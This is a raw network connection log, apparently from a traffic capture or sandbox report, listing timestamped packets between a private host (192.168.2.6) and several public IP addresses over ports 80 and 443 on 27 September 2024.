Sep 27, 2024 00:29:12.442652941 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442666054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442681074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442682981 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442732096 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442747116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442760944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442775965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442814112 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442825079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442837954 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442851067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442866087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442873001 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442889929 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442986012 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443031073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443044901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443065882 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443077087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443077087 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.443092108 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443105936 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443110943 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.443120003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443134069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443146944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443150997 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.443162918 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.443169117 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.443193913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444166899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444225073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444241047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444257975 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444277048 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444293022 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444317102 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444330931 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444344997 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444359064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444377899 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444401026 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444427013 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444439888 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444453955 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444467068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444474936 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444480896 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444494009 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444511890 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444530010 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444804907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444818020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444840908 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444853067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444869041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444870949 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444883108 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.444888115 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.444931984 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.445105076 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445270061 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445283890 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445297956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445324898 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.445329905 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445343971 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445346117 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.445358992 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445378065 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.445410013 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445424080 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445439100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445449114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.445455074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445478916 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.445508003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445523977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445538998 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445552111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.445554018 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.445585966 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446275949 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446312904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446321964 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446331978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446352959 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446367979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446382046 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446386099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446408033 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446504116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446521044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446537971 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446556091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446557045 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446573973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446583986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446590900 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446610928 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446633101 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446649075 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446666002 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446682930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446686029 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446700096 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446716070 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446717024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446734905 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446831942 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446849108 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446865082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446882963 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446885109 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446899891 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446913958 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446917057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446934938 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446938038 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446950912 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446965933 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446966887 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446984053 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.446996927 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.446999073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447016001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447040081 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.447077990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447096109 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447112083 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447129965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447134018 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.447160959 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.447314024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447330952 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447346926 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.447348118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447365046 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447380066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447405100 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.447406054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447422981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.447432995 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.447468996 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.466327906 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.466412067 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.468307018 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.468327045 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.468632936 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.470551014 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.470577002 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.470635891 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.533349991 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533377886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533396006 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533406973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533416986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533427000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533432007 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533438921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533447981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533457994 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533468962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533480883 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533493996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533495903 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533514023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533519983 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533538103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533538103 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533550978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533565044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533566952 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533577919 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533591986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533600092 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533632040 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533663034 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533675909 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533699036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533710957 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533711910 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533725023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533755064 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533780098 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533793926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533807039 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533822060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533824921 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533837080 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533838987 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533869028 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533935070 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533955097 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533968925 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533982038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.533991098 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.533993959 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.534027100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.534029961 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.534041882 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.534055948 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.534056902 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.534070015 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.534089088 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.534936905 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.534956932 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.534987926 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.535022020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.535034895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.535048962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.535073042 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.535100937 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.943589926 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:12.943685055 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:12.943751097 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:12.943933010 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:12.943953037 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:12.953378916 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.953466892 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.953537941 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.953777075 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.953804016 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.953821898 CEST	57914	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.953828096 CEST	443	57914	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.968439102 CEST	57915	80	192.168.2.6	45.132.206.251
Sep 27, 2024 00:29:12.972223997 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.972246885 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.972306967 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.972672939 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:12.972683907 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:12.975426912 CEST	80	57915	45.132.206.251	192.168.2.6
Sep 27, 2024 00:29:12.975501060 CEST	57915	80	192.168.2.6	45.132.206.251
Sep 27, 2024 00:29:12.975645065 CEST	57915	80	192.168.2.6	45.132.206.251
Sep 27, 2024 00:29:12.975683928 CEST	57915	80	192.168.2.6	45.132.206.251
Sep 27, 2024 00:29:12.982131958 CEST	80	57915	45.132.206.251	192.168.2.6
Sep 27, 2024 00:29:12.982141972 CEST	80	57915	45.132.206.251	192.168.2.6
Sep 27, 2024 00:29:12.982355118 CEST	80	57915	45.132.206.251	192.168.2.6
Sep 27, 2024 00:29:12.983566046 CEST	80	57915	45.132.206.251	192.168.2.6
Sep 27, 2024 00:29:13.451580048 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:13.451656103 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:13.453545094 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:13.453555107 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:13.453819036 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:13.455431938 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:13.455456972 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:13.455502033 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:13.748029947 CEST	80	57915	45.132.206.251	192.168.2.6
Sep 27, 2024 00:29:13.750356913 CEST	57915	80	192.168.2.6	45.132.206.251
Sep 27, 2024 00:29:13.915749073 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:13.915843010 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:13.915982008 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:13.919811010 CEST	57916	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:13.919837952 CEST	443	57916	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:13.944722891 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:13.944767952 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:13.944860935 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:13.945542097 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:13.945564032 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:14.437441111 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:14.437520027 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:14.556135893 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:14.556166887 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:14.556557894 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:14.558651924 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:14.558821917 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:14.558845997 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:15.087790012 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:15.087902069 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:15.087968111 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:15.091579914 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:15.091608047 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:15.091622114 CEST	57917	443	192.168.2.6	104.21.77.130
Sep 27, 2024 00:29:15.091628075 CEST	443	57917	104.21.77.130	192.168.2.6
Sep 27, 2024 00:29:15.107764006 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:15.107805967 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:15.108069897 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:15.108500957 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:15.108517885 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:15.812052011 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:15.812120914 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:15.847057104 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:15.847106934 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:15.847424984 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:15.851042986 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:15.891403913 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.308159113 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.308183908 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.308237076 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.308253050 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.308275938 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.308290958 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.308298111 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.308320045 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.416508913 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.416532993 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.416603088 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.416626930 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.416656017 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.416676998 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.421565056 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.421623945 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.421638966 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.421653986 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.421691895 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.436013937 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.436045885 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.436063051 CEST	57918	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:16.436069965 CEST	443	57918	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:16.462548971 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:16.462577105 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:16.462651968 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:16.463089943 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:16.463098049 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:16.951453924 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:16.951587915 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:16.955183983 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:16.955220938 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:16.955538988 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:16.957205057 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:16.957247972 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:16.957304955 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:17.420420885 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:17.420499086 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:17.423404932 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:17.596574068 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:17.596601963 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:17.596618891 CEST	57919	443	192.168.2.6	172.67.128.144
Sep 27, 2024 00:29:17.596626043 CEST	443	57919	172.67.128.144	192.168.2.6
Sep 27, 2024 00:29:28.549314976 CEST	57921	80	192.168.2.6	172.67.74.152
Sep 27, 2024 00:29:28.556513071 CEST	80	57921	172.67.74.152	192.168.2.6
Sep 27, 2024 00:29:28.556632996 CEST	57921	80	192.168.2.6	172.67.74.152
